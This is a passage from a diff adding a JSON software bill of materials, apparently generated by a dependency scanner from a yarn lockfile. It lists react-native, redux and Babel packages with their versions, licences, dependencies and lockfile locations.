+ }, + "Version": "0.7.17", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@craftzdog/react-native-buffer@6.1.1", + "events@3.3.0", + "readable-stream@4.7.0", + "string_decoder@1.3.0", + "util@0.12.5" + ], + "Locations": [ + { + "StartLine": 9208, + "EndLine": 9217 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-reanimated@4.3.0", + "Name": "react-native-reanimated", + "Identifier": { + "PURL": "pkg:npm/react-native-reanimated@4.3.0", + "UID": "82465ff232e1b071" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-is-edge-to-edge@1.3.1", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 9224, + "EndLine": 9230 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-reanimated-carousel@4.0.3", + "Name": "react-native-reanimated-carousel", + "Identifier": { + "PURL": "pkg:npm/react-native-reanimated-carousel@4.0.3", + "UID": "5597ae8c3bfaf778" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9219, + "EndLine": 9222 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-responsive-screen@1.4.2", + "Name": "react-native-responsive-screen", + "Identifier": { + "PURL": "pkg:npm/react-native-responsive-screen@1.4.2", + "UID": "583906b6b34d83a8" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9232, + "EndLine": 9235 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-safe-area-context@5.6.1", + "Name": "react-native-safe-area-context", + "Identifier": { + "PURL": "pkg:npm/react-native-safe-area-context@5.6.1", + "UID": "4cfc4a0151d9c4f8" + }, + "Version": "5.6.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9237, + "EndLine": 9240 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-screens@4.16.0", + "Name": "react-native-screens", + "Identifier": { + "PURL": "pkg:npm/react-native-screens@4.16.0", + "UID": "642f0207cff0a30f" + }, + "Version": "4.16.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-freeze@1.0.4", + "react-native-is-edge-to-edge@1.3.1", + "warn-once@0.1.1" + ], + "Locations": [ + { + "StartLine": 9242, + "EndLine": 9249 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-send-intent@1.3.0", + "Name": "react-native-send-intent", + "Identifier": { + "PURL": "pkg:npm/react-native-send-intent@1.3.0", + "UID": "825d1a47e9473b2d" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9251, + "EndLine": 9254 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-share@12.2.6", + "Name": "react-native-share", + "Identifier": { + "PURL": "pkg:npm/react-native-share@12.2.6", + "UID": "684cc0cdf5ace582" + }, + "Version": "12.2.6", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9256, + "EndLine": 9259 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-snackbar@2.9.0", + "Name": "react-native-snackbar", + "Identifier": { + "PURL": "pkg:npm/react-native-snackbar@2.9.0", + "UID": "efa4a499095da0bf" + }, + "Version": "2.9.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9261, + "EndLine": 9264 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-snap-carousel@3.9.1", + "Name": "react-native-snap-carousel", + "Identifier": { + "PURL": "pkg:npm/react-native-snap-carousel@3.9.1", + "UID": "39c8449a4422887f" + }, + "Version": "3.9.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "react-addons-shallow-compare@15.6.2" + ], + "Locations": [ + { + "StartLine": 9266, + "EndLine": 9272 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-splash-screen@3.3.0", + "Name": "react-native-splash-screen", + "Identifier": { + "PURL": "pkg:npm/react-native-splash-screen@3.3.0", + "UID": "42c0e7e6c2c913e6" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9274, + "EndLine": 9277 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-sqlite-2@3.6.2", + "Name": "react-native-sqlite-2", + "Identifier": { + "PURL": "pkg:npm/react-native-sqlite-2@3.6.2", + "UID": "1fd277de01f3ab10" + }, + "Version": "3.6.2", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash.map@4.6.0", + "lodash.zipobject@4.1.3", + "websql@2.0.3" + ], + "Locations": [ + { + "StartLine": 9279, + "EndLine": 9286 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-svg@15.14.0", + "Name": "react-native-svg", + "Identifier": { + "PURL": "pkg:npm/react-native-svg@15.14.0", + "UID": "4f28a74772ed46a3" + }, + "Version": "15.14.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "css-select@5.2.2", + "css-tree@1.1.3", + "warn-once@0.1.1" + ], + "Locations": [ + { + "StartLine": 9298, + "EndLine": 9305 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-svg-transformer@1.5.1", + "Name": "react-native-svg-transformer", + "Identifier": { + "PURL": "pkg:npm/react-native-svg-transformer@1.5.1", + "UID": "29c87f521234561f" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@svgr/core@8.1.0", + "@svgr/plugin-jsx@8.1.0", + "@svgr/plugin-svgo@8.1.0", + "path-dirname@1.0.2" + ], + "Locations": [ + { + "StartLine": 9288, + "EndLine": 9296 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-tab-view@4.3.0", + "Name": "react-native-tab-view", + "Identifier": { + "PURL": "pkg:npm/react-native-tab-view@4.3.0", + "UID": "a4d0c62f033aa82d" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 9307, + "EndLine": 9312 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-tts@4.1.1", + "Name": "react-native-tts", + "Identifier": { + "PURL": "pkg:npm/react-native-tts@4.1.1", + "UID": "1da266f7e5f0ded2" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9314, + "EndLine": 9317 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-vector-icons@10.3.0", + "Name": "react-native-vector-icons", + "Identifier": { + "PURL": "pkg:npm/react-native-vector-icons@10.3.0", + "UID": "4d93ebc9176b8e0b" + }, + "Version": "10.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "yargs@16.2.0" + ], + "Locations": [ + { + "StartLine": 9319, + "EndLine": 9325 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-video@6.17.0", + "Name": "react-native-video", + "Identifier": { + "PURL": "pkg:npm/react-native-video@6.17.0", + "UID": "5fd1a40f493c8ed8" + }, + "Version": "6.17.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9334, + "EndLine": 9337 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-video-controls@2.8.1", + "Name": "react-native-video-controls", + "Identifier": { + "PURL": "pkg:npm/react-native-video-controls@2.8.1", + "UID": "72905eeb55df2af8" + }, + "Version": "2.8.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash@4.17.21" + ], + "Locations": [ + { + "StartLine": 9327, + "EndLine": 9332 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-view-shot@4.0.3", + "Name": "react-native-view-shot", + "Identifier": { + "PURL": "pkg:npm/react-native-view-shot@4.0.3", + "UID": "2b86d07e57a1a0cb" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "html2canvas@1.4.1" + ], + "Locations": [ + { + "StartLine": 9339, + "EndLine": 9344 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-vision-camera@4.7.2", + "Name": "react-native-vision-camera", + "Identifier": { + "PURL": "pkg:npm/react-native-vision-camera@4.7.2", + "UID": "b145baa2b7f13505" + }, + "Version": "4.7.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9351, + "EndLine": 9354 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-vision-camera-v3-image-labeling@1.5.0", + "Name": "react-native-vision-camera-v3-image-labeling", + "Identifier": { + "PURL": "pkg:npm/react-native-vision-camera-v3-image-labeling@1.5.0", + "UID": "573a4720f838ba8a" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9346, + "EndLine": 9349 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-webview@13.16.0", + "Name": "react-native-webview", + "Identifier": { + "PURL": "pkg:npm/react-native-webview@13.16.0", + "UID": "876135000ae74a36" + }, + "Version": "13.16.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "escape-string-regexp@4.0.0", + "invariant@2.2.4" + ], + "Locations": [ + { + "StartLine": 9356, + "EndLine": 9362 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-worklets@0.8.1", + "Name": "react-native-worklets", + "Identifier": { + "PURL": "pkg:npm/react-native-worklets@0.8.1", + "UID": "3ce967dce8aad39c" + }, + "Version": "0.8.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/plugin-transform-arrow-functions@7.27.1", + "@babel/plugin-transform-class-properties@7.27.1", + "@babel/plugin-transform-classes@7.28.4", + "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "@babel/plugin-transform-optional-chaining@7.27.1", + "@babel/plugin-transform-shorthand-properties@7.27.1", + "@babel/plugin-transform-template-literals@7.27.1", + "@babel/plugin-transform-unicode-regex@7.27.1", + "@babel/preset-typescript@7.27.1", + "convert-source-map@2.0.0", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 9371, + "EndLine": 9386 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-worklets-core@1.6.3", + "Name": "react-native-worklets-core", + "Identifier": { + "PURL": "pkg:npm/react-native-worklets-core@1.6.3", + "UID": "d5fecd69ee48186b" + }, + "Version": "1.6.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "string-hash-64@1.0.3" + ], + "Locations": [ + { + "StartLine": 9364, + "EndLine": 9369 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-redux@9.2.0", + "Name": "react-redux", + "Identifier": { + "PURL": "pkg:npm/react-redux@9.2.0", + "UID": "a945a69c14e627e2" + }, + "Version": "9.2.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@types/use-sync-external-store@0.0.6", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 9428, + "EndLine": 9434 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "redux@5.0.1", + "Name": "redux", + "Identifier": { + "PURL": "pkg:npm/redux@5.0.1", + "UID": "6fb0b797fa624fa0" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 9522, + "EndLine": 9525 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/code-frame@7.10.4", + "Name": "@babel/code-frame", + "Identifier": { + "PURL": "pkg:npm/%40babel/code-frame@7.10.4", + "UID": "53c00e6f2c4efd0c" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/highlight@7.25.9" + ], + "Locations": [ + { + "StartLine": 14, + "EndLine": 19 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/code-frame@7.27.1", + "Name": "@babel/code-frame", + "Identifier": { + "PURL": "pkg:npm/%40babel/code-frame@7.27.1", + "UID": "1889ab0ad02c3550" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-validator-identifier@7.27.1", + "js-tokens@4.0.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 5, + "EndLine": 12 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/compat-data@7.28.4", + "Name": "@babel/compat-data", + "Identifier": { + "PURL": "pkg:npm/%40babel/compat-data@7.28.4", + "UID": "9bfb60259242cc24" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21, + "EndLine": 24 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/core@7.28.4", + "Name": "@babel/core", + "Identifier": { + "PURL": "pkg:npm/%40babel/core@7.28.4", + "UID": "1125de9b38fb88ee" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/generator@7.28.3", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-module-transforms@7.28.3", + "@babel/helpers@7.28.4", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4", + "@jridgewell/remapping@2.3.5", + "convert-source-map@2.0.0", + "debug@4.4.3", + "gensync@1.0.0-beta.2", + "json5@2.2.3", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 26, + "EndLine": 45 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/generator@7.28.3", + "Name": "@babel/generator", + "Identifier": { + "PURL": "pkg:npm/%40babel/generator@7.28.3", + "UID": "cdc8292b3f9c7a32" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31", + "jsesc@3.1.0" + ], + "Locations": [ + { + "StartLine": 56, + "EndLine": 65 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-annotate-as-pure@7.27.3", + "Name": "@babel/helper-annotate-as-pure", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-annotate-as-pure@7.27.3", + "UID": "e9e6887915370c65" + }, + "Version": "7.27.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 67, + "EndLine": 72 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-compilation-targets@7.27.2", + "Name": "@babel/helper-compilation-targets", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-compilation-targets@7.27.2", + "UID": "da06c71d3885ff08" + }, + "Version": "7.27.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/compat-data@7.28.4", + "@babel/helper-validator-option@7.27.1", + "browserslist@4.26.3", + "lru-cache@5.1.1", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 74, + "EndLine": 83 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-create-class-features-plugin@7.28.3", + "Name": "@babel/helper-create-class-features-plugin", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-create-class-features-plugin@7.28.3", + "UID": "fdac7b971289a2f3" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-member-expression-to-functions@7.27.1", + "@babel/helper-optimise-call-expression@7.27.1", + "@babel/helper-replace-supers@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "@babel/traverse@7.28.4", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 85, + "EndLine": 96 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-create-regexp-features-plugin@7.27.1", + "Name": "@babel/helper-create-regexp-features-plugin", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-create-regexp-features-plugin@7.27.1", + "UID": "abc73a81345cf11f" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-annotate-as-pure@7.27.3", + "regexpu-core@6.4.0", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 98, + "EndLine": 105 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-globals@7.28.0", + "Name": "@babel/helper-globals", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-globals@7.28.0", + "UID": "c9e7cda569d03203" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 118, + "EndLine": 121 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-member-expression-to-functions@7.27.1", + "Name": "@babel/helper-member-expression-to-functions", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-member-expression-to-functions@7.27.1", + "UID": "a8c227a249c1f910" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 123, + "EndLine": 129 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-module-imports@7.27.1", + "Name": "@babel/helper-module-imports", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-module-imports@7.27.1", + "UID": "13d6918fac8c7f2b" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 131, + "EndLine": 137 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-module-transforms@7.28.3", + "Name": "@babel/helper-module-transforms", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-module-transforms@7.28.3", + "UID": "b2c27c58b37de3c5" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-module-imports@7.27.1", + "@babel/helper-validator-identifier@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 139, + "EndLine": 146 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-optimise-call-expression@7.27.1", + "Name": "@babel/helper-optimise-call-expression", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-optimise-call-expression@7.27.1", + "UID": "4c82aaea84bde718" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 148, + "EndLine": 153 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-plugin-utils@7.27.1", + "Name": "@babel/helper-plugin-utils", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-plugin-utils@7.27.1", + "UID": "a6efd2de4b3e4e3b" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 155, + "EndLine": 158 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-replace-supers@7.27.1", + "Name": "@babel/helper-replace-supers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-replace-supers@7.27.1", + "UID": "756f45fb8bc40c20" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-member-expression-to-functions@7.27.1", + "@babel/helper-optimise-call-expression@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 169, + "EndLine": 176 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "Name": "@babel/helper-skip-transparent-expression-wrappers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-skip-transparent-expression-wrappers@7.27.1", + "UID": "5242621dd6b0200" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 178, + "EndLine": 184 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-string-parser@7.27.1", + "Name": "@babel/helper-string-parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-string-parser@7.27.1", + "UID": "b71281ac41ae9037" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 186, + "EndLine": 189 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-validator-identifier@7.27.1", + "Name": "@babel/helper-validator-identifier", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-validator-identifier@7.27.1", + "UID": "a1c9d21935bbb942" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 191, + "EndLine": 194 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helper-validator-option@7.27.1", + "Name": "@babel/helper-validator-option", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-validator-option@7.27.1", + "UID": "c34f8bb8b01e17f7" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 196, + "EndLine": 199 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/helpers@7.28.4", + "Name": "@babel/helpers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helpers@7.28.4", + "UID": "707511c79c392432" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/template@7.27.2", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 210, + "EndLine": 216 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/highlight@7.25.9", + "Name": "@babel/highlight", + "Identifier": { + "PURL": "pkg:npm/%40babel/highlight@7.25.9", + "UID": "a02ee69d0e6d0aaf" + }, + "Version": "7.25.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-validator-identifier@7.27.1", + "chalk@2.4.2", + "js-tokens@4.0.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 218, + "EndLine": 226 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/parser@7.28.4", + "Name": "@babel/parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/parser@7.28.4", + "UID": "f34c2e5ef7edf51e" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 228, + "EndLine": 233 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-async-generators@7.8.4", + "Name": "@babel/plugin-syntax-async-generators", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-async-generators@7.8.4", + "UID": "a44dc67c9bb51313" + }, + "Version": "7.8.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 286, + "EndLine": 291 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-bigint@7.8.3", + "Name": "@babel/plugin-syntax-bigint", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-bigint@7.8.3", + "UID": "612a0c694d95f97d" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 293, + "EndLine": 298 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-class-properties@7.12.13", + "Name": "@babel/plugin-syntax-class-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-class-properties@7.12.13", + "UID": "651f7c14ec5fde1e" + }, + "Version": "7.12.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 300, + "EndLine": 305 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-class-static-block@7.14.5", + "Name": "@babel/plugin-syntax-class-static-block", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-class-static-block@7.14.5", + "UID": "3dbc0cd2453625cc" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 307, + "EndLine": 312 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-import-attributes@7.27.1", + "Name": "@babel/plugin-syntax-import-attributes", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-import-attributes@7.27.1", + "UID": "626218efb679b5e3" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 342, + "EndLine": 347 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-import-meta@7.10.4", + "Name": "@babel/plugin-syntax-import-meta", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-import-meta@7.10.4", + "UID": "feaad14e3d91d7cc" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 349, + "EndLine": 354 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-json-strings@7.8.3", + "Name": "@babel/plugin-syntax-json-strings", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-json-strings@7.8.3", + "UID": "159e13edba643384" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 356, + "EndLine": 361 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-jsx@7.27.1", + "Name": "@babel/plugin-syntax-jsx", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-jsx@7.27.1", + "UID": "671a8e42d6ef3eaa" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 363, + "EndLine": 368 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-logical-assignment-operators@7.10.4", + "Name": "@babel/plugin-syntax-logical-assignment-operators", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-logical-assignment-operators@7.10.4", + "UID": "41fb21ac22f11738" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 370, + "EndLine": 375 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "Name": "@babel/plugin-syntax-nullish-coalescing-operator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "UID": "8809eba0461fa32d" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 377, + "EndLine": 382 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-numeric-separator@7.10.4", + "Name": "@babel/plugin-syntax-numeric-separator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-numeric-separator@7.10.4", + "UID": "75732f6866e1556c" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ 